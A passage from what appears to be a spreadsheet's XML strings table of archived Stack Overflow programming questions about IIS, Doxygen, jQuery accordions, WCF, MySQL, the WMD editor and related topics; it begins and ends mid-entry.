/communitydetail.asp, line 42
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;IIS 7 changes the way ASP errors are handled and displays something a lot less helpful. For example,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone know what configuration changes are required to get the behavior of IIS 6 in IIS 7?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Merging C Callergraphs with Doxygen or determining union of all calls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a collection of legacy C code which I'm refactoring to split the C computational code from the GUI. This is complicated by the heavily recursive mathematical core code being K&amp;amp;R style declarations. I've already abandoned an attempt to convert these to ANSI declarations due to nested use of function parameters (just couldn't get those last 4 compiler errors to go).&lt;/p&gt;
&lt;p&gt;I need to move some files into a pure DLL and determine the minimal interface to make public, which is going to require wrapper functions writing to publish a typed interface.&lt;/p&gt;
&lt;p&gt;I've marked up the key source files with the Doxygen @callergraph markup so informative graphs are generated for individual functions. What I'd like to do beyond that is amalgamate these graphs so I can determine the narrowest boundary of functions exposed to the outside world.&lt;/p&gt;
&lt;p&gt;The original header files are no use - they expose everything as untyped C functions.&lt;/p&gt;
&lt;p&gt;There are hundreds of functions so simple inspection of the generated callergraphs is painful.&lt;/p&gt;
&lt;p&gt;I'm considering writing some kind of DOT merge tool - setting DOT_CLEANUP=NO makes Doxygen leave the intermediate DOT files there rather then just retaining the png files they generated.&lt;/p&gt;
&lt;p&gt;I'm not obsessed by this being a graphical solution - I'd be quite happy if someone could suggest an alternative analysis tool (free or relatively cheap) or technique using Doxygen's XML output to achieve the same goal.&lt;/p&gt;
&lt;p&gt;A callergraph amalgamated at the file level does have a certain appeal for client documentation rather than a plain list :-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get Visual Web Developer to use IIS, and not ASP.NET development server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to make sure my local is matching the production environment closely and that means running IIS and not the ASP.NET development server that comes with Visual Web Developer express edition. What is the best way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET MVC: How to create form from controller?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In .NET 3.5 winforms, I've created an MVC.  I'd like to take the controller part and put it into a separate assembly, so that it has no knowledge of the view.  My app uses five forms in its view.  The controller takes care of initializing the forms at different times, which means the controller has a reference to the view (something I'd rather not).  This means the controller can't be separated since it needs to know the form types being created, which probably means it isn't a true controller.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find path where SQL Server is installed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I get the path where SQL Server 2005 is installed in a system, through SQL command?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Forms auth - gettings user data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using forms authentication on a very small ASP.NET web app (Web Forms) in which I want to store additional info about the user in a separate database table.&lt;/p&gt;
&lt;p&gt;This is then linked back to the &lt;code&gt;aspnet_User&lt;/code&gt; table and I was figuring the best column to link to is the &lt;code&gt;UserId&lt;/code&gt; column. Problem is I can't work out how to get this piece of data when the user is logged in. Is it even possible?&lt;/p&gt;
&lt;p&gt;Also, how do I get the email address?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Before someone points it out, I am aware of the ProfileProvider but the details stored need to be re-submitted each year (it's a registration application for a sporting club) and all previous data stored. So the ProfileProvider isn't really applicable (unless I'm wrong and it can be used to have it stored &lt;em&gt;historically&lt;/em&gt;?). &lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF translation transform</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can i get the new bounds after applying a translation transform to a WPF mesh geometry 3D?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>trim is not part of the standard c/c++ library?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it me or are there no standard trim functions in the c or c++ library? is there any single function that acts as a trim? If not can anyone tell me Why trim is not part of the standard library? (i know trim is in boost)&lt;/p&gt;
&lt;p&gt;My trim code is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;std::string trim(const std::string &amp;amp;str)
{
    size_t s = str.find_first_not_of(" \n\r\t");
    size_t e = str.find_last_not_of (" \n\r\t");
    if(( string::npos == s) || ( string::npos == e))
        return "";
    else
        return str.substr(s, e-s+1);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;test: cout &amp;lt;&amp;lt; trim("  \n\r\r\n \r\n text here\nwith return   \n\r\r\n \r\n ");
-edit-
i mostly wanted to know why it wasnt in the standard library, BobbyShaftoe answer is great. &lt;a href="http://stackoverflow.com/questions/479080/trim-is-not-part-of-the-standard-c-c-library#479091"&gt;http://stackoverflow.com/questions/479080/trim-is-not-part-of-the-standard-c-c-library#479091&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Who has the best metaphor for WPF dependency properties?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm reading WPF Recipes in C# 2008:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.apress.com/book/view/9781430210849" rel="nofollow"&gt;http://www.apress.com/book/view/9781430210849&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;and starting on the third recipe they asssume you know how dependency properties work. &lt;/p&gt;
&lt;p&gt;So after a little googling, I understand in general that these are properties of an object which when placed inside another object "adapts to the context" to the host object. I also "learned" that "you never really know what the value of these properties are since they depend on their context."&lt;/p&gt;
&lt;p&gt;But still much of what is being described in the book leaves me with no idea how I could use these when building applications.&lt;/p&gt;
&lt;p&gt;Who has a good metaphor or example of dependency properties for people starting out with them and wanting to know when and how they would use them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Nested accordion menu in jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a menu implemented using a set of nested accordions, &lt;code&gt;1&lt;/code&gt; and &lt;code&gt;2&lt;/code&gt;, each with elements, &lt;code&gt;a&lt;/code&gt; and &lt;code&gt;b&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I would like to implement the following logic:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;When I click &lt;code&gt;1a&lt;/code&gt;, I will get the data of &lt;code&gt;1a&lt;/code&gt; and two submenu &lt;code&gt;2a&lt;/code&gt;,&lt;code&gt;2b&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;When I click &lt;code&gt;2a&lt;/code&gt;, &lt;code&gt;2b&lt;/code&gt; I will get the data of each, respectively.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;The problem&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Desired result:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I only want to display the &lt;code&gt;nth-most&lt;/code&gt; child element for the last click, collapsing all others.&lt;/li&gt;
&lt;li&gt;Upon initialization, only &lt;code&gt;1a&lt;/code&gt; and &lt;code&gt;1b&lt;/code&gt; should be visible.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Current result:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Clicking on &lt;code&gt;1b&lt;/code&gt;, then on &lt;code&gt;2b&lt;/code&gt;, &lt;code&gt;1b&lt;/code&gt; is still fully visible.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;JavaScript code&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;$(document).ready(function() {
    $("#acc1").accordion({
        active:".ui-accordion-left",
        alwaysOpen: false,
        autoheight: false,
        header: 'a.acc1',
        clearStyle: true
    });
    $("#acc2").accordion({
        alwaysOpen: false,
        autoheight: false,
        header: 'a.acc2',
        clearStyle: true
    });
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;HTML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul id="acc1" class="ui-accordion-container"&amp;gt;
    &amp;lt;li&amp;gt;
        &amp;lt;div class="ui-accordion-left"&amp;gt;&amp;lt;/div&amp;gt;
        &amp;lt;a class="ui-accordion-link acc1"&amp;gt;1a
            &amp;lt;span class="ui-accordion-right"&amp;gt;&amp;lt;/span&amp;gt;
        &amp;lt;/a&amp;gt;
        &amp;lt;div&amp;gt;
            data of 1a&amp;lt;br/&amp;gt;
            data of 1a&amp;lt;br/&amp;gt;
            data of 1a&amp;lt;br/&amp;gt;
        &amp;lt;/div&amp;gt;
        &amp;lt;div&amp;gt;
            &amp;lt;ul class="ui-accordion-container" id="acc2"&amp;gt;
                &amp;lt;li&amp;gt;
                    &amp;lt;div class="ui-accordion-left"&amp;gt;&amp;lt;/div&amp;gt;
                    &amp;lt;a class="ui-accordion-link acc2"&amp;gt;2a
                        &amp;lt;span class="ui-accordion-right"&amp;gt;&amp;lt;/span&amp;gt;
                    &amp;lt;/a&amp;gt;
                    &amp;lt;div&amp;gt;
                        data of 2a&amp;lt;br/&amp;gt;
                        data of 2a&amp;lt;br/&amp;gt;
                        data of 2a&amp;lt;br/&amp;gt;
                    &amp;lt;/div&amp;gt;
                &amp;lt;/li&amp;gt;
                &amp;lt;li&amp;gt;
                    &amp;lt;div class="ui-accordion-left"&amp;gt;&amp;lt;/div&amp;gt;
                    &amp;lt;a class="ui-accordion-link acc2"&amp;gt;2b
                        &amp;lt;span class="ui-accordion-right"&amp;gt;&amp;lt;/span&amp;gt;
                    &amp;lt;/a&amp;gt;
                    &amp;lt;div&amp;gt;
                        data of 2b&amp;lt;br/&amp;gt;
                        data of 2b&amp;lt;br/&amp;gt;
                        data of 2b&amp;lt;br/&amp;gt;
                    &amp;lt;/div&amp;gt;
                &amp;lt;/li&amp;gt;
            &amp;lt;/ul&amp;gt;
        &amp;lt;/div&amp;gt;
    &amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;
        &amp;lt;div class="ui-accordion-left"&amp;gt;&amp;lt;/div&amp;gt;
        &amp;lt;a class="ui-accordion-link acc1"&amp;gt;1b
            &amp;lt;span class="ui-accordion-right"&amp;gt;&amp;lt;/span&amp;gt;
        &amp;lt;/a&amp;gt;
        &amp;lt;div&amp;gt;
            data of 1b&amp;lt;br /&amp;gt;
            data of 1b&amp;lt;br /&amp;gt;
            dta of 1b &amp;lt;br /&amp;gt;
        &amp;lt;/div&amp;gt;
    &amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>detect os language from c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to detect the Language of the OS from within a c# class?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Microsoft.Reporting.* vs XML/XSLT</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to add reporting capabilities to a .NET application. My data source is just the data model of the application, i.e. a bunch of objects that may have been generated or loaded from anything (not necessarily from a database).&lt;/p&gt;
&lt;p&gt;The initial plan was to generate a report data XML file from these objects, and then use XSLT to transform this into an XHTML report file. The report can then be shown in the application with a browser control.&lt;/p&gt;
&lt;p&gt;However, I've noticed that there exist Microsoft.Reporting.* namespaces and from what I've tried, it seems that the classes and controls in there can also take care of my reporting. Would it be a good idea to use this instead? Will it save work compared to the XML/XSLT approach? What limitations (if any) of the Microsoft Reporting framework am I likely to run into? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>One Cache for various Applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have two applications - one is an asp.net website and the other is a windows service.&lt;/p&gt;
&lt;p&gt;both applications are referencing my business layer (library project), which itself is referencing my data access layer (library project) that itself uses the enterprise library data application block to receive the data form a sql server 2005 database.&lt;/p&gt;
&lt;p&gt;currently i use the System.Web.Caching.Cache object in my BL to cache some of my objects:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static System.Web.Caching.Cache Cache
	{
		get
		{
			if(cache == null)
			{
				if (System.Web.HttpContext.Current != null)
				{
					//asp.net
					cache = System.Web.HttpContext.Current.Cache;
				}
				else
				{
					//windows service
					cache = System.Web.HttpRuntime.Cache;
				}
			}
			return cache;
		}
	}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;as both applications are running on their own - they both are using a separate Cache object on their own - and this is the problem actually:&lt;/p&gt;
&lt;p&gt;if i change a object in the asp.net website and save it to the DB. the object to this cache key is removed from the cache - the asp.net application's cache! that's fine.&lt;/p&gt;
&lt;p&gt;but the windows service's Cache becomes stale!&lt;/p&gt;
&lt;p&gt;vice-versa&lt;/p&gt;
&lt;p&gt;is it possible that both applications are using the same Cache? One Cache for both applications?&lt;/p&gt;
&lt;p&gt;the only option i have i think about is that i will have to use SqlDependency with &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;a href="http://quickstarts.asp.net/QuickStartv20/aspnet/doc/caching/SQLInvalidation.aspx" rel="nofollow"&gt;Sql Server 2005 Notification-based Cache Invalidation&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;is there any other way?&lt;/p&gt;
&lt;p&gt;EDIT:
i just found &lt;a href="http://www.codeplex.com/SharedCache" rel="nofollow"&gt;http://www.codeplex.com/SharedCache&lt;/a&gt;. i will give it a try.
as because velocity will be in release candidate status until mid 2009.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enum ToString with user friendly strings</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My enum consists of the following values:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private enum PublishStatusses{
    NotCompleted,
    Completed,
    Error
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to be able to output these values in a user friendly way though.&lt;br&gt;
I don't need to be able to go from string to value again.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I make more then one request on a curl connection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In PHP (v5), is there a way to make multiple requests on an open curl connection?&lt;/p&gt;
&lt;p&gt;I'm noticing that my big bottleneck is the timeout/teardown of the connection its self (i'm making lots of small data requests that finish quickly), so I would like to be able to do something like open&lt;/p&gt;
&lt;p&gt;init curl connection,&lt;/p&gt;
&lt;p&gt;set url/params, do request, get results
set url/params, do request, get results
&lt;/p&gt;
&lt;p&gt;close curl&lt;/p&gt;
&lt;p&gt;I just dont know if this is possible at all.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you get resin to serve index.html by default if you navigate to a directory? (equivalent of DirectoryIndex in Apache)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to configure &lt;a href="http://caucho.com/resin/" rel="nofollow"&gt;Resin&lt;/a&gt; to serve static files such that navigating to e.g. &lt;a href="http://localhost:8888/foo/bar/" rel="nofollow"&gt;http://localhost:8888/foo/bar/&lt;/a&gt; will serve the file foo/bar/index.html (without performing a redirect)? I can't find the answer in the Resin docs, though I might be looking in the wrong place.&lt;/p&gt;
&lt;p&gt;The equivalent in Apache would be the DirectoryIndex directive.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the actual value of a DependancyProperty?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a small UserControl and it needs to know the Background Brush of the control on which it's being rendered.&lt;/p&gt;
&lt;p&gt;However, if I look in the Background property of the UserControl it comes back null. &lt;/p&gt;
&lt;p&gt;If I call GetValue(UserControl.BackgroundProperty) it also returns null even though up the Visual tree it is definitely being set.&lt;/p&gt;
&lt;p&gt;Seems like I must be missing something pretty obvious as it's can't be that hard to figure  out the background colour of a control.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>File / Folder monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to monitor disks against file activities. I mean that getting the full file name (c:\temp\abc.txt), action(created/deleted/modified/renamed), and also the user (user1) and process name (notepad.exe) causing the file (multiple delete) activities.&lt;/p&gt;
&lt;p&gt;I heard about Some APIs and ShellNotifications but could not use them for the whole needs above.&lt;/p&gt;
&lt;p&gt;Best regards.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IE6 Bullet Point Alignment Problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently having some problems with &lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt; in IE6 essentially my code looks like this,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul&amp;gt;
  &amp;lt;li&amp;gt;some filler text some filler text&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;some filler text some filler text&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;some filler text some filler text&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem come when I view the page in IE 6 the bullets and the text do not line up as you would expect has any one ever encountered this problem before, for the record here is the CSS for the div and li concerned. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    #contentMiddle li
    {
    /*background-image:url(../images/bullet.gif);
    background-repeat:no-repeat;
    background-position:left bottom;
    text-align:left;
    list-style-position:outside;*/
    list-style-image:url(../images/bullet.gif);
    list-style-position:inside;
    text-align:left;
    margin-bottom:5px;
    }
    #contentMiddle
    {
    background-color:#A3BAD9;
    padding-left:20px;
    padding-right:20px;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thank you for your help&lt;/p&gt;
&lt;p&gt;sico87 :-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.asmx web services with ssl</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any special configuration settings you have to do to make a web service work with SSL?&lt;/p&gt;
&lt;p&gt;Is there a way to force the service methods to authenticate using a username/password like I can do with a WCF service?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to programmatically create a Quick Campaign in MS Dynamics CRM</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to create a "quick campaign" in code, but I don't find a class to do that.&lt;/p&gt;
&lt;p&gt;I found the way to create a list and add users to that list. But I can't continue, because I don't know the way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Com Object Exception</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wrote an application that loops through a set of records and prints two things. &lt;/p&gt;
&lt;p&gt;One is a report from SSRS wich works correctly. &lt;/p&gt;
&lt;p&gt;The other is a drawing that uses a COM object to print. The COM object randomly fails and causes the program to quit. &lt;/p&gt;
&lt;p&gt;Is there a way to stop it from killing the entire program when the COM Object fails? I have tried catch every exception at every level and it still does not work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WCF Service Throttling</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Lets assume that I'm dealing with a service that involves sending large amounts of data.&lt;/p&gt;
&lt;p&gt;If I implement this with WCF, will WCF throttle the service based on how much memory each request takes to serve? Or will I be getting continuous out of memory exceptions each time I receive a large number of hits to my service?&lt;/p&gt;
&lt;p&gt;I'm quite curious as to dealing with this problem outside of WCF, I'm still a bit new to service development...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>User variables - fighting syntax</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone set my MySQL syntax straight please?
I am trying to set a user variable called "seconds" to equal the output of the query shown below (and it does work by it's self), but I am constantly geting "You have an error in your SQL syntax" errors.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SET @seconds=AVG(t2.epoch-t1.epoch)
             FROM tmp_4045_metrics AS t1, tmp_4045_metrics AS t2
             WHERE t1.seq+1 = t2.seq
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried SELECT AVG...., (SELECT AVG...), and quite a few others, but always the same error warning that my syntax is incorrect and never any clues to where it's incorrect.&lt;/p&gt;
&lt;p&gt;Can anyone point me in the right direction?&lt;/p&gt;
&lt;p&gt;Thanks,
Rich&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Apache is listening on a different port, but how do I get it so I don't have to type in the port number?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am running IIS and Apache HTTP Server side-by-side on my localhost machine, and Apache is listening on a different port (port 81). IIS is listening to port 80. However, I can only get to my virtual domains for Apache if I type in that port number. So for instance:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://virtual.myvirtualdomain.com:81" rel="nofollow"&gt;http://virtual.myvirtualdomain.com:81&lt;/a&gt;
&lt;a href="http://virtual.myvirtualdomain2.com:81" rel="nofollow"&gt;http://virtual.myvirtualdomain2.com:81&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;How can I make it so Apache automatically knows it is port 81, and does not force me to type in the port number?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The answer appears to be that I need to redirect IIS to Apache. Can anyone provide clarification on how that is done with IIS 5.1?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET - running a bat script on another machine</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to run a bat script on one of the machines on the domain, from my asp.net application. Machine with the batch script is a temporary storage machine, and script synchronizes it with the permanent storage machine. So, what is the optimal way of doing this?&lt;/p&gt;
&lt;p&gt;The thing I tried is to use &lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" rel="nofollow"&gt;PsExec&lt;/a&gt; to run a script on the remote machine. I create  a process that makes a PsExec call, and it actually does it's job pretty well. However, since the ASP.NET worker thread runs under ASP.NET account that has restricted privileges, I must hard-code my domain user credentials in PsExec call, and that's something I do not like doing. &lt;/p&gt;
&lt;p&gt;Is there a way to overcome this problem, or maybe some other approach that I could try?&lt;/p&gt;
&lt;p&gt;Thanks...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calling WSE service from a .net 3.5 application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to call a .asmx (WSE) web service from a .net 3.5 application.&lt;/p&gt;
&lt;p&gt;This is possible correct?
It seems when I add a web reference the API is completely different than when I add a reference in a .net 2.0 app.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is the "_" prefix reserved for MovieClip names?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to use the &lt;strong&gt;"_" underscore prefix&lt;/strong&gt; for your own &lt;strong&gt;MovieClip names?&lt;/strong&gt; (AS2)&lt;/p&gt;
&lt;p&gt;i.e. Can you name a created/attached MovieClip "_feature" or "_bug" ?&lt;/p&gt;
&lt;p&gt;Typically this is reserved for &lt;strong&gt;internal properties&lt;/strong&gt; like &lt;code&gt;_x&lt;/code&gt; or &lt;code&gt;_visible&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>should i really use a relation table when tagging blog posts?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;while trying to figure out how to tag a blog post with a single sql statement &lt;a href="http://stackoverflow.com/questions/480065/nested-insert-in-mysql-for-tagging"&gt;here&lt;/a&gt;, the following thought crossed my mind: using a relation table tag2post that references tags by id as follows just isn't necessary:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tags
+-------+-----------+
| tagid | tag       |
+-------+-----------+
|     1 | news      | 
|     2 | top-story | 
+-------+-----------+
tag2post
+----+--------+-------+
| id | postid | tagid |     
+----+--------+-------+
|  0 |    322 |     1 |
+----+--------+-------+
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;why not&lt;/strong&gt; just using the following model, where you &lt;strong&gt;index the tag itself&lt;/strong&gt; as follows? taken that tags are never renamed, but added and removed, this could make sense, right? what do you think?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tag2post
+----+--------+-------+
| id | postid | tag   |     
+----+--------+-------+
|  1 |    322 | sun   |
+----+--------+-------+
|  2 |    322 | moon  |
+----+--------+-------+
|  3 |   4443 | sun   |
+----+--------+-------+
|  4 |   2567 | love  |
+----+--------+-------+
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;PS: i keep an &lt;strong&gt;id&lt;/strong&gt;, i order to easily display the last &lt;em&gt;n&lt;/em&gt; tags added...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you convert LOGFONT.lfHeight to pixels?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a LOGFONT.lfHeight value of -11. However, I know that the font size is actually 8 so do I need to convert this number to a different unit of measurement? I found this formula in the MSDN docs:&lt;/p&gt;
&lt;p&gt;int height = abs((pixels * DOTSY) / 72);&lt;/p&gt;
&lt;p&gt;This takes pixels and makes it into a height value that LOGFONT can use. If I work this the other way:&lt;/p&gt;
&lt;p&gt;int pixels = abs((height / DOTSY) * 72);&lt;/p&gt;
&lt;p&gt;This gives me a value of 8.24. Am I correct in assuming this is all I need to do to convert the font height into a usable value?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem getting selected text when using a sprited button and selection.createRange() in Internet Explorer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on implementing sprited buttons in Stackoverflow's beloved WMD markdown editor and I've run into an odd bug.  On all versions of IE, the selected text is lost upon button clicks, so, say, highlighting a block of text and clicking the code button acts like you placed the cursor at the end of the selection and clicked the button.&lt;/p&gt;
&lt;p&gt;e.g. highlighting this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;This
Is
Code
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and clicking the code button give you:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;This
Is
Code`enter code here`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What's really weird is that I left the original non-sprited button bar in &lt;em&gt;and that works just fine.&lt;/em&gt;  In fact &lt;strong&gt;ALL&lt;/strong&gt; buttons and keyboard shortcuts code use the same &lt;code&gt;doClick(button)&lt;/code&gt; function!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Old-style non-sprited buttons: OK&lt;/li&gt;
&lt;li&gt;Keyboard shortcuts: OK&lt;/li&gt;
&lt;li&gt;Sprited buttons in non-IE browsers: OK&lt;/li&gt;
&lt;li&gt;Sprited buttons in IE: &lt;strong&gt;WTF&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I've isolated the problem down to a call to &lt;code&gt;selection.createRange()&lt;/code&gt; which finds nothing &lt;strong&gt;only&lt;/strong&gt; when the sprited button is clicked.  I've tried screwing around with focus()ing and making sure as little as possible happens before the &lt;code&gt;doClick()&lt;/code&gt; but no joy.  The keyboard shortcuts seem to work because the focus is never lost from the input textarea.  Can anyone think of a hack that will let me somehow collect the selected text in IE?&lt;/p&gt;
&lt;p&gt;The onclick handler looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;button.onmouseout = function(){
  this.style.backgroundPosition = this.XShift + " " + normalYShift;
};
button.onclick = function() {
  if (this.onmouseout) {
    this.onmouseout();
  }
  doClick(this);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried moving the &lt;code&gt;onmouseout&lt;/code&gt; call to after the &lt;code&gt;doClick&lt;/code&gt; in case that was causing a loss of focus but that's not the problem.&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;The only thing that seems to be different is that, in the original button code, you are clicking on an image.  In the sprited code, you are clicking on a list item &lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt; with a background image set.  Perhaps it's trying to select the non-existent text in my list item?&lt;/p&gt;
&lt;p&gt;/EDIT&lt;/p&gt;
&lt;p&gt;Actual code is located in my wmd repository on &lt;a href="http://github.com/derobins/wmd/tree/master" rel="nofollow"&gt;git&lt;/a&gt; in the &lt;code&gt;button-cleanup&lt;/code&gt; branch.&lt;/p&gt;
&lt;p&gt;If you revert to the 0d6d1b32bb42a6bd1d4ac4e409a19fdfe8f1ffcc commit you can see both button bars.  The top one is sprited and exhibits the weird behavior.  The bottom one contains the remnants of the original button bar and works fine.  The suspect code is in the &lt;code&gt;setInputAreaSelectionStartEnd()&lt;/code&gt; function in the &lt;code&gt;TextareaState&lt;/code&gt; object.&lt;/p&gt;
&lt;p&gt;One last thing I should mention is that, for the time being, I'm trying to keep the control in pure Javascript so I'd like to avoid fixing this with an external library like jQuery if that's possible.&lt;/p&gt;
&lt;p&gt;Thanks for your help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Send message from one running console app to another</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have one console app that is doing some lengthy syncing to an ftp server.&lt;br /&gt;
Another console app prepares a local filesystem with some needed updated files.&lt;br /&gt;
Then the second one will wait for the first one to finish before swapping a final directory name so it becomes visible on the web.&lt;/p&gt;
&lt;p&gt;I searched for the best way to make the syncing app to communicate to the second app that it's finished it's job. It looks like &lt;a href="http://msdn.microsoft.com/en-us/library/aa365574(VS.85).aspx#base.using_data_copy_for_ipc"&gt;Using Data Copy for IPC&lt;/a&gt; is the best suited solution for this.  &lt;/p&gt;
&lt;p&gt;Question is two fold:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Am I right? Is there a more straight forward way to get to the same result?&lt;/li&gt;
&lt;li&gt;Is there a managed (.net) way to do this?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How to efficiently render and process video streams using GPU?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I plan to develop a tool for realtime video manipulation using C++, Qt and OpenGL. Video overlay isn't an option since shaders should be used for frame processing. At the moment I imagine a following sequence of steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Decode video (CPU)&lt;/li&gt;
&lt;li&gt;Preprocess it (optional, CPU)&lt;/li&gt;
